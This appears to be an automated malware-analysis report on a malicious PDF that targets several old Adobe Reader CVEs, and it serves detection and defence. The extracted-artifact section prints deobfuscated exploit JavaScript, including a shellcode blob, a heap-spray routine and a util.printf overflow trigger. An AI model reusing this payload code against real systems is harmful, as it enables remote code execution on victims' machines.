Verdict: MALICIOUS
Risk Score: 676
Malware Insights
MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
This PDF contains obfuscated JavaScript that exploits multiple CVEs in Adobe Reader, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The script is designed to download and execute a second-stage payload, as indicated by the 'Pdf.Exploit.Agent-36086' and 'Js.Exploit.Shellcode-18' detections. The embedded JavaScript is heavily obfuscated and uses techniques like eval() and String.fromCharCode() to hide its malicious intent.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (12)
- media.newPlayer — CVE-2009-4324 (critical, CVE, exact, rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical, CVE, exact, rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE, exact, rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 (critical, CVE, exact, rule CVE_2008_2992): PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical, CVE, likely, rule PDF_PIDIEF_MULTI_CVE_DISPATCH): A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- ClamAV: Pdf.Exploit.Agent-36086 (critical, rule CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Exploit.Agent-36086
- Multi-CVE Adobe Reader JavaScript exploit kit (critical, rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT): One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low, 3 related findings, rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Large comment-padded JavaScript eval stager (high, rule PDF_JS_LARGE_COMMENT_PADDED_EVAL): PDF JavaScript contains a very large stream padded with long random-looking block comments around String.fromCharCode and eval. This is an exploit-kit obfuscation shape used to bury a decoder and recovered stage inside noise, not normal PDF form automation.
- Embedded JS stream (low, rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info, rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Hash | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0006_000.js | 541998c66b4742bbc22c813630b67d3722a2ccaf9f3b0f13a268b3b764869ddd | pdf-javascript-stream | PDF /JS object 6 at offset 0x143 | 627991 bytes |
| legacy_pdfkit_stage_000.js | 28262790445e308ca681fabb6b339f96a1aefd649be4a1b17e58422ed54f5723 | deobfuscated-js | comment-padded substitution-hex decoded JavaScript at offset 0x143 | 10413 bytes |

Artifact 1: javascript_obj0006_000.js
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 42 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
```javascript
function crV(gFQ){ /*
... (truncated)
```

Artifact 2: legacy_pdfkit_stage_000.js
Detection
- ClamAV: Js.Exploit.Shellcode-18
- Obfuscation or payload: likely. Carved artifact contains 12 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
```javascript
function fix_it(yarsp,len)
{
while(yarsp.length*2<len){yarsp+=yarsp;} yarsp=yarsp.substring(0,len/2);return yarsp;
}
function util_printf()
{
var payload=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u09FF%uE951%u6D0F%uD9F0%u090F%u6251%u054F%u99DA%uA413%u99DA%u8807%uE995%uF6F8%u62AE%uB2E3%uE919%u090F%uE93B%u8767%uE71F%u61E3%u17C9%u0785%u0639%uE9C1%u8131%uC33C%uB2DB%u3167%u4573%u61E8%uA0BB%uE185%u3239%u2A85%u81B8%u4554%u344B%uE567%uEAC6%uE103%uE84E%u090F%uEDD8%u8A24%uEDBA%uC904%u1824%u6767%u9D34%u610F%u8026%u6061%u1605%u215A%uB008%uC904%u6D5E%u09F7%uE951%uF984%uB1EA%u090F%u8351%u610F%uAD78%u5EE7%uA039%u06E2%u812F%u4284%uB6B2%uE9E7%uE951%u800F%uC255%uE28C%uE255%u7CCF%u64A0%u098A%uE953%u590F%u1639%u090F%u1651%u3D5A%u6CDC%u0D0F%uE951%u635F%u8351%u840F%uE9D4%u090D%uB951%u5CF0%u6469%u09BA%uE955%uA50F%u295B%uF27A%u2E1F%u2709%u9134%uCE6A%uED17%u090F%uE951%u8C82%uED51%u090F%u2062%u595E%uBCAE%u4933%u6D5E%u098F%uE951%u8047%uA514%u0967%uE911%u630F%u1611%u415A%u295A%u677B%uACD8%u636F%u8351%u630F%u8351%u630F%u1651%u595A%u295A%u537B%uE93B%u0967%uE951%u630B%u8351%uE00F%uE9FB%u090F%u1601%u5D5A%u295A%u4B7B%uACD8%u8467%u8D14%u615F%uA951%u090F%u9CAE%uF66F%u8124%u5CF0%uE209%u7DCF%u6244%u6D4A%u295A%u077B%u9CAE%uF66B%u8924%u7CF0%u161D%u495A%u3CBA%u7CF0%u161D%u4D5A%u207A%u584E%u6CDC%u0D0F%uE951%uF65F%uC504%uF665%uBCAE%u5C3F%u05DA%u7484%uE259%u7DF0%uBA1A%uD784%u6207%u357C%u9DDA%u713C%u1A52%u8259%uC927%uFA0C%u2062%u4846%uEAFC%u5FCC%u1F62%uB700%uD141%u7DD9%u2859%u04C1%u1B52%uE24F%uD2A0%u57F1%u0C24%u8255%u62BA%u2D55%u3452%u8269%uA25D%u5384%uEA4D%u82D2%u6255%uCC0C%uB20F%u0BE4%u2962%uCB52%uE955%u58E7%u16AE%u61F0%u9D25%u337F%uC67E%u7A6E%u8838%u7961%u9B3E%u7D61%u8023%u277F%u8632%u2662%u9B25%u6D6E%uC634%u6A30%uD86C%u7A29%u8D38%u3032%uDC61%u6F6C%u8C32%u303E%u8D60%u6F6E%u8D67%u3C6D%u8D32%u686A%u8F34%u3F6A%u8865%u3B6C%uD132%u2F6A%uD422%u093C%uE951%u000F");
var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock=nop+payload;
var bigblock=unescape("%u0A0A%u0A0A");
var headersize=20;
var spray=headersize+heapblock.length;
while(bigblock.length<spray){bigblock+=bigblock;}
var fillblock=bigblock.substring(0,spray);
var block=bigblock.substring(0,bigblock.length-spray);
while(block.length+spray<0x40000){block=block+block+fillblock;}
var mem_array=new Array();
for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("%45000f",num);
}
function collab_email()
{
var shellcode=unescape("%u9090%u9090%u9090%u20EB%u8B5E%uADFE%uC00B%u0175%u8BC3%u2BD8%uABC0%uC88B%uB966%u021F%uE9C1%u4102%u33AD%uABC3%uFAE2%u09EB%uDBE8%uFFFF%u09FF%uE951%u6D0F%uD9F0%u090F%u6251%u054F%u99DA%uA413%u99DA%u8807%uE995%uF6F8%u62AE%uB2E3%uE919%u090F%uE93B%u8767%uE71F%u61E3%u17C9%u0785%u0639%uE9C1%u8131%uC33C%uB2DB%u3167%u4573%u61E8%uA0BB%uE185%u3239%u2A85%u81B8%u4554%u344B%uE567%uEAC6%uE103%uE84E%u090F%uEDD8%u8A24%uEDBA%uC904%u1824%u6767%u9D34%u610F%u8026%u6061%u1605%u215A%uB008%uC904%u6D5E%u09F7%uE951%uF984%uB1EA%u090F%u8351%u610F%uAD78%u5EE7%uA039%u06E2%u812F%u4284%uB6B2%uE9E7%uE951%u800F%uC255%uE28C%uE255%u7CCF%u64A0%u098A%uE953%u590F%u1639%u090F%u1651%u3D5A%u6CDC%u0D0F%uE951%u635F%u8351%u840F%uE9D4%u090D%uB951%u5CF0%u6469%u09BA%uE955%uA50F%u295B%uF27A%u2E1F%u2709%u9134%uCE6A%uED17%u090F%uE951%u8C82%uED51%u090F%u2062%u595E%uBCAE%u4933%u6D5E%u098F%uE951%u8047%uA514%u0967%uE911%u630F%u1611%u415A%u295A%u677B%uACD8%u636F%u8351%u630F%u8351%u630F%u1651%u595A%u295A%u537B%uE93B%u0967%uE951%u630B%u8351%uE00F%uE9FB%u090F%u1601%u5D5A%u295A%u4B7B%uACD8%u8467%u8D14%u615F%uA951%u090F%u9CAE%uF66F%u8124%u5CF0%uE209%u7DCF%u6244%u6D4A%u295A%u077B%u9CAE%uF66B%u8924%u7CF0%u161D%u495A%u3CBA%u7CF0%u161D%u4D5A%u207A%u584E%u6CDC%u0D0F%uE951%uF65F%uC504%uF665%uBCAE%u5C3F%u05DA%u7484%uE259%u7DF0
... (truncated)
```